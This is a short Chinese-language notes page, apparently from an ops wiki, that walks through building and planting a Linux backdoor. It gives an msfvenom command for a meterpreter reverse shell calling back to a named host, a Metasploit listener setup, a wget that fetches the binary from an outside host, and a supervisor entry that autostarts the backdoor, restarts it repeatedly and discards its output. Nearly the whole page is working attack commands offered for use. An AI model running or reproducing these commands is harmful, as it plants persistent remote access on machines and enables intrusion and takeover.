Linux
# 生成
msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=bd.opschina.org LPORT=4444 -b "\x00" -f elf -o bd.linux.bin


# 监听
use exploit/multi/handler
set LHOST 0.0.0.0
set LPORT 4444
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set ExitOnSession false
exploit -j

# 部署
wget http://ojv12llai.bkt.clouddn.com/uploads/20170421162514.bin  -O bd.linux.2.bin && chmod a+x bd.linux.bin

# supervisor启动菜单

[program:bd]
priority=1
command=/bin/bd.linux.bin
directory=/tmp
autostart=true
autorestart=true
startretries=100
stopsignal=TERM
stopasgroup=true        ; 是否想UNIX进程组发送结束信号 (default false)
killasgroup=true             ; SIGKILL UNIX 进
stderr_logfile=/dev/null
stdout_logfile=/dev/null
Copyright © opschina.org 2017 with zzlyzq@gmail.com all right reserved,powered by Gitbook该文件修订时间: 2017-07-11 11:32:48

results matching ""

    No results matching ""